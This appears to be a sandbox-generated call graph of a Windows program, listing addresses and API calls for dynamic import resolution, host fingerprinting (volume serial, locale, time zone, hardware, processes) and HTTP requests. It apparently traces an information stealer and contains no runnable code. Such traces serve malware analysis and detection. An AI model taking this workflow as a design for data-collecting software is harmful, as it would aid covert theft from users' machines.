14436->14437 14438 843ce 14437->14438 14439 845c0 2 API calls 14438->14439 14440 843e7 14439->14440 14441 845c0 2 API calls 14440->14441 14442 84400 14441->14442 14443 845c0 2 API calls 14442->14443 14444 84419 14443->14444 14445 845c0 2 API calls 14444->14445 14446 84432 14445->14446 14447 845c0 2 API calls 14446->14447 14448 8444b 14447->14448 14449 845c0 2 API calls 14448->14449 14450 84464 14449->14450 14451 845c0 2 API calls 14450->14451 14452 8447d 14451->14452 14453 845c0 2 API calls 14452->14453 14454 84496 14453->14454 14455 845c0 2 API calls 14454->14455 14456 844af 14455->14456 14457 845c0 2 API calls 14456->14457 14458 844c8 14457->14458 14459 845c0 2 API calls 14458->14459 14460 844e1 14459->14460 14461 845c0 2 API calls 14460->14461 14462 844fa 14461->14462 14463 845c0 2 API calls 14462->14463 14464 84513 14463->14464 14465 845c0 2 API calls 14464->14465 14466 8452c 14465->14466 14467 845c0 2 API calls 14466->14467 14468 84545 14467->14468 14469 845c0 2 API calls 14468->14469 14470 8455e 14469->14470 14471 845c0 2 API calls 14470->14471 14472 84577 14471->14472 14473 845c0 2 API calls 14472->14473 14474 84590 14473->14474 14475 845c0 2 API calls 14474->14475 14476 845a9 14475->14476 14477 99c10 14476->14477 14478 99c20 43 API calls 14477->14478 14479 9a036 8 API calls 14477->14479 14478->14479 14480 9a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14479->14480 14481 9a146 14479->14481 14480->14481 14482 9a153 8 API calls 14481->14482 14483 9a216 14481->14483 14482->14483 14484 9a298 14483->14484 14485 9a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14483->14485 14486 9a2a5 6 API calls 14484->14486 14487 9a337 14484->14487 14485->14484 14486->14487 14488 9a41f 14487->14488 14489 9a344 9 API calls 14487->14489 14490 9a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14488->14490 14491 9a4a2 14488->14491 14489->14488 14490->14491 14492 9a4ab GetProcAddress GetProcAddress 14491->14492 14493 9a4dc 14491->14493 14492->14493 14494 9a515 14493->14494 14495 9a4e5 GetProcAddress GetProcAddress 14493->14495 14496 9a612 14494->14496 14497 9a522 10 API calls 14494->14497 14495->14494 14498 9a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14496->14498 14499 9a67d 14496->14499 14497->14496 14498->14499 14500 9a69e 14499->14500 14501 9a686 GetProcAddress 14499->14501 14502 95ca3 14500->14502 14503 9a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14500->14503 14501->14500 14504 81590 14502->14504 14503->14502 15623 81670 14504->15623 14507 9a7a0 lstrcpy 14508 815b5 14507->14508 14509 9a7a0 lstrcpy 14508->14509 14510 815c7 14509->14510 14511 9a7a0 lstrcpy 14510->14511 14512 815d9 14511->14512 14513 9a7a0 lstrcpy 14512->14513 14514 81663 14513->14514 14515 95510 14514->14515 14516 95521 14515->14516 14517 9a820 2 API calls 14516->14517 14518 9552e 14517->14518 14519 9a820 2 API calls 14518->14519 14520 9553b 14519->14520 14521 9a820 2 API calls 14520->14521 14522 95548 14521->14522 14523 9a740 lstrcpy 14522->14523 14524 95555 14523->14524 14525 9a740 lstrcpy 14524->14525 14526 95562 14525->14526 14527 9a740 lstrcpy 14526->14527 14528 9556f 14527->14528 14529 9a740 lstrcpy 14528->14529 14531 9557c 14529->14531 14530 951f0 20 API calls 14530->14531 14531->14530 14532 95643 StrCmpCA 14531->14532 14533 956a0 StrCmpCA 14531->14533 14538 9a740 lstrcpy 14531->14538 14539 9a820 lstrlen lstrcpy 14531->14539 14541 95856 StrCmpCA 14531->14541 14544 9a8a0 lstrcpy 14531->14544 14551 95a0b StrCmpCA 14531->14551 14559 81590 lstrcpy 14531->14559 14562 952c0 25 API calls 14531->14562 14565 9578a StrCmpCA 14531->14565 14567 9593f StrCmpCA 14531->14567 14568 9a7a0 lstrcpy 14531->14568 14532->14531 14533->14531 14534 957dc 14533->14534 14535 9a8a0 lstrcpy 14534->14535 14536 957e8 14535->14536 14537 9a820 2 API calls 14536->14537 14540 957f6 14537->14540 14538->14531 14539->14531 14542 9a820 2 API calls 14540->14542 14541->14531 14543 95991 14541->14543 14546 95805 14542->14546 14545 9a8a0 lstrcpy 14543->14545 14544->14531 14547 9599d 14545->14547 14548 81670 lstrcpy 14546->14548 14549 9a820 2 API calls 14547->14549 14569 95811 14548->14569 14550 959ab 14549->14550 14552 9a820 2 API calls 14550->14552 14553 95a28 14551->14553 14554 95a16 Sleep 14551->14554 14555 959ba 14552->14555 14556 9a8a0 lstrcpy 14553->14556 14554->14531 14557 81670 lstrcpy 14555->14557 14558 95a34 14556->14558 14557->14569 14560 9a820 2 API calls 14558->14560 14559->14531 14561 95a43 14560->14561 14563 9a820 2 API calls 14561->14563 14562->14531 14564 95a52 14563->14564 14566 81670 lstrcpy 14564->14566 14565->14531 14566->14569 14567->14531 14568->14531 14569->13622 14571 9754c 14570->14571 14572 97553 GetVolumeInformationA 14570->14572 14571->14572 14573 97591 14572->14573 14574 975fc GetProcessHeap RtlAllocateHeap 14573->14574 14575 97619 14574->14575 14576 97628 wsprintfA 14574->14576 14577 9a740 lstrcpy 14575->14577 14578 9a740 lstrcpy 14576->14578 14579 95da7 14577->14579 14578->14579 14579->13643 14581 9a7a0 lstrcpy 14580->14581 14582 84899 14581->14582 15632 847b0 14582->15632 14584 848a5 14585 9a740 lstrcpy 14584->14585 14586 848d7 14585->14586 14587 9a740 lstrcpy 14586->14587 14588 848e4 14587->14588 14589 9a740 lstrcpy 14588->14589 14590 848f1 14589->14590 14591 9a740 lstrcpy 14590->14591 14592 848fe 14591->14592 14593 9a740 lstrcpy 14592->14593 14594 8490b InternetOpenA StrCmpCA 14593->14594 14595 84944 14594->14595 14596 84ecb InternetCloseHandle 14595->14596 15638 98b60 14595->15638 14598 84ee8 14596->14598 15653 89ac0 CryptStringToBinaryA 14598->15653 14599 84963 15646 9a920 14599->15646 14602 84976 14604 9a8a0 lstrcpy 14602->14604 14610 8497f 14604->14610 14605 9a820 2 API calls 14606 84f05 14605->14606 14607 9a9b0 4 API calls 14606->14607 14609 84f1b 14607->14609 14608 84f27 codecvt 14612 9a7a0 lstrcpy 14608->14612 14611 9a8a0 lstrcpy 14609->14611 14613 9a9b0 4 API calls 14610->14613 14611->14608 14625 84f57 14612->14625 14614 849a9 14613->14614 14615 9a8a0 lstrcpy 14614->14615 14616 849b2 14615->14616 14617 9a9b0 4 API calls 14616->14617 14618 849d1 14617->14618 14619 9a8a0 lstrcpy 14618->14619 14620 849da 14619->14620 14621 9a920 3 API calls 14620->14621 14622 849f8 14621->14622 14623 9a8a0 lstrcpy 14622->14623 14624 84a01 14623->14624 14626 9a9b0 4 API calls 14624->14626 14625->13646 14627 84a20 14626->14627 14628 9a8a0 lstrcpy 14627->14628 14629 84a29 14628->14629 14630 9a9b0 4 API calls 14629->14630 14631 84a48 14630->14631 14632 9a8a0 lstrcpy 14631->14632 14633 84a51 14632->14633 14634 9a9b0 4 API calls 14633->14634 14635 84a7d 14634->14635 14636 9a920 3 API calls 14635->14636 14637 84a84 14636->14637 14638 9a8a0 lstrcpy 14637->14638 14639 84a8d 14638->14639 14640 84aa3 InternetConnectA 14639->14640 14640->14596 14641 84ad3 HttpOpenRequestA 14640->14641 14643 84b28 14641->14643 14644 84ebe InternetCloseHandle 14641->14644 14645 9a9b0 4 API calls 14643->14645 14644->14596 14646 84b3c 14645->14646 14647 9a8a0 lstrcpy 14646->14647 14648 84b45 14647->14648 14649 9a920 3 API calls 14648->14649 14650 84b63 14649->14650 14651 9a8a0 lstrcpy 14650->14651 14652 84b6c 14651->14652 14653 9a9b0 4 API calls 14652->14653 14654 84b8b 14653->14654 14655 9a8a0 lstrcpy 14654->14655 14656 84b94 14655->14656 14657 9a9b0 4 API calls 14656->14657 14658 84bb5 14657->14658 14659 9a8a0 lstrcpy 14658->14659 14660 84bbe 14659->14660 14661 9a9b0 4 API calls 14660->14661 14662 84bde 14661->14662 14663 9a8a0 lstrcpy 14662->14663 14664 84be7 14663->14664 14665 9a9b0 4 API calls 14664->14665 14666 84c06 14665->14666 14667 9a8a0 lstrcpy 14666->14667 14668 84c0f 14667->14668 14669 9a920 3 API calls 14668->14669 14670 84c2d 14669->14670 14671 9a8a0 lstrcpy 14670->14671 14672 84c36 14671->14672 14673 9a9b0 4 API calls 14672->14673 14674 84c55 14673->14674 14675 9a8a0 lstrcpy 14674->14675 14676 84c5e 14675->14676 14677 9a9b0 4 API calls 14676->14677 14678 84c7d 14677->14678 14679 9a8a0 lstrcpy 14678->14679 14680 84c86 14679->14680 14681 9a920 3 API calls 14680->14681 14682 84ca4 14681->14682 14683 9a8a0 lstrcpy 14682->14683 14684 84cad 14683->14684 14685 9a9b0 4 API calls 14684->14685 14686 84ccc 14685->14686 14687 9a8a0 lstrcpy 14686->14687 14688 84cd5 14687->14688 14689 9a9b0 4 API calls 14688->14689 14690 84cf6 14689->14690 14691 9a8a0 lstrcpy 14690->14691 14692 84cff 14691->14692 14693 9a9b0 4 API calls 14692->14693 14694 84d1f 14693->14694 14695 9a8a0 lstrcpy 14694->14695 14696 84d28 14695->14696 14697 9a9b0 4 API calls 14696->14697 14698 84d47 14697->14698 14699 9a8a0 lstrcpy 14698->14699 14700 84d50 14699->14700 14701 9a920 3 API calls 14700->14701 14702 84d6e 14701->14702 14703 9a8a0 lstrcpy 14702->14703 14704 84d77 14703->14704 14705 9a740 lstrcpy 14704->14705 14706 84d92 14705->14706 14707 9a920 3 API calls 14706->14707 14708 84db3 14707->14708 14709 9a920 3 API calls 14708->14709 14710 84dba 14709->14710 14711 9a8a0 lstrcpy 14710->14711 14712 84dc6 14711->14712 14713 84de7 lstrlen 14712->14713 14714 84dfa 14713->14714 14715 84e03 lstrlen 14714->14715 15652 9aad0 14715->15652 14717 84e13 HttpSendRequestA 14718 84e32 InternetReadFile 14717->14718 14719 84e67 InternetCloseHandle 14718->14719 14724 84e5e 14718->14724 14722 9a800 14719->14722 14721 9a9b0 4 API calls 14721->14724 14722->14644 14723 9a8a0 lstrcpy 14723->14724 14724->14718 14724->14719 14724->14721 14724->14723 15659 9aad0 14725->15659 14727 917c4 StrCmpCA 14728 917cf ExitProcess 14727->14728 14729 917d7 14727->14729 14730 919c2 14729->14730 14731 918ad StrCmpCA 14729->14731 14732 918cf StrCmpCA 14729->14732 14733 9185d StrCmpCA 14729->14733 14734 9187f StrCmpCA 14729->14734 14735 918f1 StrCmpCA 14729->14735 14736 91951 StrCmpCA 14729->14736 14737 91970 StrCmpCA 14729->14737 14738 91913 StrCmpCA 14729->14738 14739 91932 StrCmpCA 14729->14739 14740 9a820 lstrlen lstrcpy 14729->14740 14730->13648 14731->14729 14732->14729 14733->14729 14734->14729 14735->14729 14736->14729 14737->14729 14738->14729 14739->14729 14740->14729 14742 9a7a0 lstrcpy 14741->14742 14743 85979 14742->14743 14744 847b0 2 API calls 14743->14744 14745 85985 14744->14745 14746 9a740 lstrcpy 14745->14746 14747 859ba 14746->14747 14748 9a740 lstrcpy 14747->14748 14749 859c7 14748->14749 14750 9a740 lstrcpy 14749->14750 14751 859d4 14750->14751 14752 9a740 lstrcpy 14751->14752 14753 859e1 14752->14753 14754 9a740 lstrcpy 14753->14754 14755 859ee InternetOpenA StrCmpCA 14754->14755 14756 85a1d 14755->14756 14757 85fc3 InternetCloseHandle 14756->14757 14759 98b60 3 API calls 14756->14759 14758 85fe0 14757->14758 14762 89ac0 4 API calls 14758->14762 14760 85a3c 14759->14760 14761 9a920 3 API calls 14760->14761 14763 85a4f 14761->14763 14764 85fe6 14762->14764 14765 9a8a0 lstrcpy 14763->14765 14766 9a820 2 API calls 14764->14766 14768 8601f codecvt 14764->14768 14770 85a58 14765->14770 14767 85ffd 14766->14767 14769 9a9b0 4 API calls 14767->14769 14772 9a7a0 lstrcpy 14768->14772 14771 86013 14769->14771 14774 9a9b0 4 API calls 14770->14774 14773 9a8a0 lstrcpy 14771->14773 14782 8604f 14772->14782 14773->14768 14775 85a82 14774->14775 14776 9a8a0 lstrcpy 14775->14776 14777 85a8b 14776->14777 14778 9a9b0 4 API calls 14777->14778 14779 85aaa 14778->14779 14780 9a8a0 lstrcpy 14779->14780 14781 85ab3 14780->14781 14783 9a920 3 API calls 14781->14783 14782->13654 14784 85ad1 14783->14784 14785 9a8a0 lstrcpy 14784->14785 14786 85ada 14785->14786 14787 9a9b0 4 API calls 14786->14787 14788 85af9 14787->14788 14789 9a8a0 lstrcpy 14788->14789 14790 85b02 14789->14790 14791 9a9b0 4 API calls 14790->14791 14792 85b21 14791->14792 14793 9a8a0 lstrcpy 14792->14793 14794 85b2a 14793->14794 14795 9a9b0 4 API calls 14794->14795 14796 85b56 14795->14796 14797 9a920 3 API calls 14796->14797 14798 85b5d 14797->14798 14799 9a8a0 lstrcpy 14798->14799 14800 85b66 14799->14800 14801 85b7c InternetConnectA 14800->14801 14801->14757 14802 85bac HttpOpenRequestA 14801->14802 14804 85c0b 14802->14804 14805 85fb6 InternetCloseHandle 14802->14805 14806 9a9b0 4 API calls 14804->14806 14805->14757 14807 85c1f 14806->14807 14808 9a8a0 lstrcpy 14807->14808 14809 85c28 14808->14809 14810 9a920 3 API calls 14809->14810 14811 85c46 14810->14811 14812 9a8a0 lstrcpy 14811->14812 14813 85c4f 14812->14813 14814 9a9b0 4 API calls 14813->14814 14815 85c6e 14814->14815 14816 9a8a0 lstrcpy 14815->14816 14817 85c77 14816->14817 14818 9a9b0 4 API calls 14817->14818 14819 85c98 14818->14819 14820 9a8a0 lstrcpy 14819->14820 14821 85ca1 14820->14821 14822 9a9b0 4 API calls 14821->14822 14823 85cc1 14822->14823 14824 9a8a0 lstrcpy 14823->14824 14825 85cca 14824->14825 14826 9a9b0 4 API calls 14825->14826 14827 85ce9 14826->14827 14828 9a8a0 lstrcpy 14827->14828 14829 85cf2 14828->14829 14830 9a920 3 API calls 14829->14830 14831 85d10 14830->14831 14832 9a8a0 lstrcpy 14831->14832 14833 85d19 14832->14833 14834 9a9b0 4 API calls 14833->14834 14835 85d38 14834->14835 14836 9a8a0 lstrcpy 14835->14836 14837 85d41 14836->14837 14838 9a9b0 4 API calls 14837->14838 14839 85d60 14838->14839 14840 9a8a0 lstrcpy 14839->14840 14841 85d69 14840->14841 14842 9a920 3 API calls 14841->14842 14843 85d87 14842->14843 14844 9a8a0 lstrcpy 14843->14844 14845 85d90 14844->14845 14846 9a9b0 4 API calls 14845->14846 14847 85daf 14846->14847 14848 9a8a0 lstrcpy 14847->14848 14849 85db8 14848->14849 14850 9a9b0 4 API calls 14849->14850 14851 85dd9 14850->14851 14852 9a8a0 lstrcpy 14851->14852 14853 85de2 14852->14853 14854 9a9b0 4 API calls 14853->14854 14855 85e02 14854->14855 14856 9a8a0 lstrcpy 14855->14856 14857 85e0b 14856->14857 14858 9a9b0 4 API calls 14857->14858 14859 85e2a 14858->14859 14860 9a8a0 lstrcpy 14859->14860 14861 85e33 14860->14861 14862 9a920 3 API calls 14861->14862 14863 85e54 14862->14863 14864 9a8a0 lstrcpy 14863->14864 14865 85e5d 14864->14865 14866 85e70 lstrlen 14865->14866 15660 9aad0 14866->15660 14868 85e81 lstrlen GetProcessHeap RtlAllocateHeap 15661 9aad0 14868->15661 14870 85eae lstrlen 14871 85ebe 14870->14871 14872 85ed7 lstrlen 14871->14872 14873 85ee7 14872->14873 14874 85ef0 lstrlen 14873->14874 14875 85f04 14874->14875 14876 85f1a lstrlen 14875->14876 15662 9aad0 14876->15662 14878 85f2a HttpSendRequestA 14879 85f35 InternetReadFile 14878->14879 14880 85f6a InternetCloseHandle 14879->14880 14884 85f61 14879->14884 14880->14805 14882 9a9b0 4 API calls 14882->14884 14883 9a8a0 lstrcpy 14883->14884 14884->14879 14884->14880 14884->14882 14884->14883 14887 91077 14885->14887 14886 91151 14886->13656 14887->14886 14888 9a820 lstrlen lstrcpy 14887->14888 14888->14887 14891 90db7 14889->14891 14890 90f17 14890->13664 14891->14890 14892 90ea4 StrCmpCA 14891->14892 14893 90e27 StrCmpCA 14891->14893 14894 90e67 StrCmpCA 14891->14894 14895 9a820 lstrlen lstrcpy 14891->14895 14892->14891 14893->14891 14894->14891 14895->14891 14899 90f67 14896->14899 14897 91044 14897->13672 14898 90fb2 StrCmpCA 14898->14899 14899->14897 14899->14898 14900 9a820 lstrlen lstrcpy 14899->14900 14900->14899 14902 9a740 lstrcpy 14901->14902 14903 91a26 14902->14903 14904 9a9b0 4 API calls 14903->14904 14905 91a37 14904->14905 14906 9a8a0 lstrcpy 14905->14906 14907 91a40 14906->14907 14908 9a9b0 4 API calls 14907->14908 14909 91a5b 14908->14909 14910 9a8a0 lstrcpy 14909->14910 14911 91a64 14910->14911 14912 9a9b0 4 API calls 14911->14912 14913 91a7d 14912->14913 14914 9a8a0 lstrcpy 14913->14914 14915 91a86 14914->14915 14916 9a9b0 4 API calls 14915->14916 14917 91aa1 14916->14917 14918 9a8a0 lstrcpy 14917->14918 14919 91aaa 14918->14919 14920 9a9b0 4 API calls 14919->14920 14921 91ac3 14920->14921 14922 9a8a0 lstrcpy 14921->14922 14923 91acc 14922->14923 14924 9a9b0 4 API calls 14923->14924 14925 91ae7 14924->14925 14926 9a8a0 lstrcpy 14925->14926 14927 91af0 14926->14927 14928 9a9b0 4 API calls 14927->14928 14929 91b09 14928->14929 14930 9a8a0 lstrcpy 14929->14930 14931 91b12 14930->14931 14932 9a9b0 4 API calls 14931->14932 14933 91b2d 14932->14933 14934 9a8a0 lstrcpy 14933->14934 14935 91b36 14934->14935 14936 9a9b0 4 API calls 14935->14936 14937 91b4f 14936->14937 14938 9a8a0 lstrcpy 14937->14938 14939 91b58 14938->14939 14940 9a9b0 4 API calls 14939->14940 14941 91b76 14940->14941 14942 9a8a0 lstrcpy 14941->14942 14943 91b7f 14942->14943 14944 97500 6 API calls 14943->14944 14945 91b96 14944->14945 14946 9a920 3 API calls 14945->14946 14947 91ba9 14946->14947 14948 9a8a0 lstrcpy 14947->14948 14949 91bb2 14948->14949 14950 9a9b0 4 API calls 14949->14950 14951 91bdc 14950->14951 14952 9a8a0 lstrcpy 14951->14952 14953 91be5 14952->14953 14954 9a9b0 4 API calls 14953->14954 14955 91c05 14954->14955 14956 9a8a0 lstrcpy 14955->14956 14957 91c0e 14956->14957 15663 97690 GetProcessHeap RtlAllocateHeap 14957->15663 14960 9a9b0 4 API calls 14961 91c2e 14960->14961 14962 9a8a0 lstrcpy 14961->14962 14963 91c37 14962->14963 14964 9a9b0 4 API calls 14963->14964 14965 91c56 14964->14965 14966 9a8a0 lstrcpy 14965->14966 14967 91c5f 14966->14967 14968 9a9b0 4 API calls 14967->14968 14969 91c80 14968->14969 14970 9a8a0 lstrcpy 14969->14970 14971 91c89 14970->14971 15670 977c0 GetCurrentProcess IsWow64Process 14971->15670 14974 9a9b0 4 API calls 14975 91ca9 14974->14975 14976 9a8a0 lstrcpy 14975->14976 14977 91cb2 14976->14977 14978 9a9b0 4 API calls 14977->14978 14979 91cd1 14978->14979 14980 9a8a0 lstrcpy 14979->14980 14981 91cda 14980->14981 14982 9a9b0 4 API calls 14981->14982 14983 91cfb 14982->14983 14984 9a8a0 lstrcpy 14983->14984 14985 91d04 14984->14985 14986 97850 3 API calls 14985->14986 14987 91d14 14986->14987 14988 9a9b0 4 API calls 14987->14988 14989 91d24 14988->14989 14990 9a8a0 lstrcpy 14989->14990 14991 91d2d 14990->14991 14992 9a9b0 4 API calls 14991->14992 14993 91d4c 14992->14993 14994 9a8a0 lstrcpy 14993->14994 14995 91d55 14994->14995 14996 9a9b0 4 API calls 14995->14996 14997 91d75 14996->14997 14998 9a8a0 lstrcpy 14997->14998 14999 91d7e 14998->14999 15000 978e0 3 API calls 14999->15000 15001 91d8e 15000->15001 15002 9a9b0 4 API calls 15001->15002 15003 91d9e 15002->15003 15004 9a8a0 lstrcpy 15003->15004 15005 91da7 15004->15005 15006 9a9b0 4 API calls 15005->15006 15007 91dc6 15006->15007 15008 9a8a0 lstrcpy 15007->15008 15009 91dcf 15008->15009 15010 9a9b0 4 API calls 15009->15010 15011 91df0 15010->15011 15012 9a8a0 lstrcpy 15011->15012 15013 91df9 15012->15013 15672 97980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15013->15672 15016 9a9b0 4 API calls 15017 91e19 15016->15017 15018 9a8a0 lstrcpy 15017->15018 15019 91e22 15018->15019 15020 9a9b0 4 API calls 15019->15020 15021 91e41 15020->15021 15022 9a8a0 lstrcpy 15021->15022 15023 91e4a 15022->15023 15024 9a9b0 4 API calls 15023->15024 15025 91e6b 15024->15025 15026 9a8a0 lstrcpy 15025->15026 15027 91e74 15026->15027 15674 97a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15027->15674 15030 9a9b0 4 API calls 15031 91e94 15030->15031 15032 9a8a0 lstrcpy 15031->15032 15033 91e9d 15032->15033 15034 9a9b0 4 API calls 15033->15034 15035 91ebc 15034->15035 15036 9a8a0 lstrcpy 15035->15036 15037 91ec5 15036->15037 15038 9a9b0 4 API calls 15037->15038 15039 91ee5 15038->15039 15040 9a8a0 lstrcpy 15039->15040 15041 91eee 15040->15041 15677 97b00 GetUserDefaultLocaleName 15041->15677 15044 9a9b0 4 API calls 15045 91f0e 15044->15045 15046 9a8a0 lstrcpy 15045->15046 15047 91f17 15046->15047 15048 9a9b0 4 API calls 15047->15048 15049 91f36 15048->15049 15050 9a8a0 lstrcpy 15049->15050 15051 91f3f 15050->15051 15052 9a9b0 4 API calls 15051->15052 15053 91f60 15052->15053 15054 9a8a0 lstrcpy 15053->15054 15055 91f69 15054->15055 15681 97b90 15055->15681 15057 91f80 15058 9a920 3 API calls 15057->15058 15059 91f93 15058->15059 15060 9a8a0 lstrcpy 15059->15060 15061 91f9c 15060->15061 15062 9a9b0 4 API calls 15061->15062 15063 91fc6 15062->15063 15064 9a8a0 lstrcpy 15063->15064 15065 91fcf 15064->15065 15066 9a9b0 4 API calls 15065->15066 15067 91fef 15066->15067 15068 9a8a0 lstrcpy 15067->15068 15069 91ff8 15068->15069 15693 97d80 GetSystemPowerStatus 15069->15693 15072 9a9b0 4 API calls 15073 92018 15072->15073 15074 9a8a0 lstrcpy 15073->15074 15075 92021 15074->15075 15076 9a9b0 4 API calls 15075->15076 15077 92040 15076->15077 15078 9a8a0 lstrcpy 15077->15078 15079 92049 15078->15079 15080 9a9b0 4 API calls 15079->15080 15081 9206a 15080->15081 15082 9a8a0 lstrcpy 15081->15082 15083 92073 15082->15083 15084 9207e GetCurrentProcessId 15083->15084 15695 99470 OpenProcess 15084->15695 15087 9a920 3 API calls 15088 920a4 15087->15088 15089 9a8a0 lstrcpy 15088->15089 15090 920ad 15089->15090 15091 9a9b0 4 API calls 15090->15091 15092 920d7 15091->15092 15093 9a8a0 lstrcpy 15092->15093 15094 920e0 15093->15094 15095 9a9b0 4 API calls 15094->15095 15096 92100 15095->15096 15097 9a8a0 lstrcpy 15096->15097 15098 92109 15097->15098 15700 97e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15098->15700 15101 9a9b0 4 API calls 15102 92129 15101->15102 15103 9a8a0 lstrcpy 15102->15103 15104 92132 15103->15104 15105 9a9b0 4 API calls 15104->15105 15106 92151 15105->15106 15107 9a8a0 lstrcpy 15106->15107 15108 9215a 15107->15108 15109 9a9b0 4 API calls 15108->15109 15110 9217b 15109->15110 15111 9a8a0 lstrcpy 15110->15111 15112 92184 15111->15112 15704 97f60 15112->15704 15115 9a9b0 4 API calls 15116 921a4 15115->15116 15117 9a8a0 lstrcpy 15116->15117 15118 921ad 15117->15118 15119 9a9b0 4 API calls 15118->15119 15120 921cc 15119->15120 15121 9a8a0 lstrcpy 15120->15121 15122 921d5 15121->15122 15123 9a9b0 4 API calls 15122->15123 15124 921f6 15123->15124 15125 9a8a0 lstrcpy 15124->15125 15126 921ff 15125->15126 15717 97ed0 GetSystemInfo wsprintfA 15126->15717 15129 9a9b0 4 API calls 15130 9221f 15129->15130 15131 9a8a0 lstrcpy 15130->15131 15132 92228 15131->15132 15133 9a9b0 4 API calls 15132->15133 15134 92247 15133->15134 15135 9a8a0 lstrcpy 15134->15135 15136 92250 15135->15136 15137 9a9b0 4 API calls 15136->15137 15138 92270 15137->15138 15139 9a8a0 lstrcpy 15138->15139 15140 92279 15139->15140 15719 98100 GetProcessHeap RtlAllocateHeap 15140->15719 15143 9a9b0 4 API calls 15144 92299 15143->15144 15145 9a8a0 lstrcpy 15144->15145 15146 922a2 15145->15146 15147 9a9b0 4 API calls 15146->15147 15148 922c1 15147->15148 15149 9a8a0 lstrcpy 15148->15149 15150 922ca 15149->15150 15151 9a9b0 4 API calls 15150->15151 15152 922eb 15151->15152 15153 9a8a0 lstrcpy 15152->15153 15154 922f4 15153->15154 15725 987c0 15154->15725 15157 9a920 3 API calls 15158 9231e 15157->15158 15159 9a8a0 lstrcpy 15158->15159 15160 92327 15159->15160 15161 9a9b0 4 API calls 15160->15161 15162 92351 15161->15162 15163 9a8a0 lstrcpy 15162->15163 15164 9235a 15163->15164 15165 9a9b0 4 API calls 15164->15165 15166 9237a 15165->15166 15167 9a8a0 lstrcpy 15166->15167 15168 92383 15167->15168 15169 9a9b0 4 API calls 15168->15169 15170 923a2 15169->15170 15171 9a8a0 lstrcpy 15170->15171 15172 923ab 15171->15172 15730 981f0 15172->15730 15174 923c2 15175 9a920 3 API calls 15174->15175 15176 923d5 15175->15176 15177 9a8a0 lstrcpy 15176->15177 15178 923de 15177->15178 15179 9a9b0 4 API calls 15178->15179 15180 9240a 15179->15180 15181 9a8a0 lstrcpy 15180->15181 15182 92413 15181->15182 15183 9a9b0 4 API calls 15182->15183 15184 92432 15183->15184 15185 9a8a0 lstrcpy 15184->15185 15186 9243b 15185->15186 15187 9a9b0 4 API calls 15186->15187 15188 9245c 15187->15188 15189 9a8a0 lstrcpy 15188->15189 15190 92465 15189->15190 15191 9a9b0 4 API calls 15190->15191 15192 92484 15191->15192 15193 9a8a0 lstrcpy 15192->15193 15194 9248d 15193->15194 15195 9a9b0 4 API calls 15194->15195 15196 924ae 15195->15196 15197 9a8a0 lstrcpy 15196->15197 15198 924b7 15197->15198 15738 98320 15198->15738 15200 924d3 15201 9a920 3 API calls 15200->15201 15202 924e6 15201->15202 15203 9a8a0 lstrcpy 15202->15203 15204 924ef 15203->15204 15205 9a9b0 4 API calls 15204->15205 15206 92519 15205->15206 15207 9a8a0 lstrcpy 15206->15207 15208 92522 15207->15208 15209 9a9b0 4 API calls 15208->15209 15210 92543 15209->15210 15211 9a8a0 lstrcpy 15210->15211 15212 9254c 15211->15212 15213 98320 17 API calls 15212->15213 15214 92568 15213->15214 15215 9a920 3 API calls 15214->15215 15216 9257b 15215->15216 15217 9a8a0 lstrcpy 15216->15217 15218 92584 15217->15218 15219 9a9b0 4 API calls 15218->15219 15220 925ae 15219->15220 15221 9a8a0 lstrcpy 15220->15221 15222 925b7 15221->15222 15223 9a9b0 4 API calls 15222->15223 15224 925d6 15223->15224 15225 9a8a0 lstrcpy 15224->15225 15226 925df 15225->15226 15227 9a9b0 4 API calls 15226->15227 15228 92600 15227->15228 15229 9a8a0 lstrcpy 15228->15229 15230 92609 15229->15230 15774 98680 15230->15774 15232 92620 15233 9a920 3 API calls 15232->15233 15234 92633 15233->15234 15235 9a8a0 lstrcpy 15234->15235 15236 9263c 15235->15236 15237 9265a lstrlen 15236->15237 15238 9266a 15237->15238 15239 9a740 lstrcpy 15238->15239 15240 9267c 15239->15240 15241 81590 lstrcpy 15240->15241 15242 9268d 15241->15242 15784 95190 15242->15784 15244 92699 15244->13676 15972 9aad0 15245->15972 15247 85009 InternetOpenUrlA 15251 85021 15247->15251 15248 8502a InternetReadFile 15248->15251 15249 850a0 InternetCloseHandle InternetCloseHandle 15250 850ec 15249->15250 15250->13680 15251->15248 15251->15249 15973 898d0 15252->15973 15254 90759 15255 90a38 15254->15255 15256 9077d 15254->15256 15257 81590 lstrcpy 15255->15257 15259 90799 StrCmpCA 15256->15259 15258 90a49 15257->15258 16149 90250 15258->16149 15261 90843 15259->15261 15262 907a8 15259->15262 15265 90865 StrCmpCA 15261->15265 15264 9a7a0 lstrcpy 15262->15264 15266 907c3 15264->15266 15267 90874 15265->15267 15304 9096b 15265->15304 15268 81590 lstrcpy 15266->15268 15269 9a740 lstrcpy 15267->15269 15270 9080c 15268->15270 15272 90881 15269->15272 15273 9a7a0 lstrcpy 15270->15273 15271 9099c StrCmpCA 15274 909ab 15271->15274 15275 90a2d 15271->15275 15276 9a9b0 4 API calls 15272->15276 15277 90823 15273->15277 15278 81590 lstrcpy 15274->15278 15275->13684 15279 908ac 15276->15279 15280 9a7a0 lstrcpy 15277->15280 15281 909f4 15278->15281 15282 9a920 3 API calls 15279->15282 15283 9083e 15280->15283 15284 9a7a0 lstrcpy 15281->15284 15285 908b3 15282->15285 15976 8fb00 15283->15976 15287 90a0d 15284->15287 15288 9a9b0 4 API calls 15285->15288 15289 9a7a0 lstrcpy 15287->15289 15290 908ba 15288->15290 15291 90a28 15289->15291 15292 9a8a0 lstrcpy 15290->15292 15304->15271 15624 9a7a0 lstrcpy 15623->15624 15625 81683 15624->15625 15626 9a7a0 lstrcpy 15625->15626 15627 81695 15626->15627 15628 9a7a0 lstrcpy 15627->15628 15629 816a7 15628->15629 15630 9a7a0 lstrcpy 15629->15630 15631 815a3 15630->15631 15631->14507 15633 847c6 15632->15633 15634 84838 lstrlen 15633->15634 15658 9aad0 15634->15658 15636 84848 InternetCrackUrlA 15637 84867 15636->15637 15637->14584 15639 9a740 lstrcpy 15638->15639 15640 98b74 15639->15640 15641 9a740 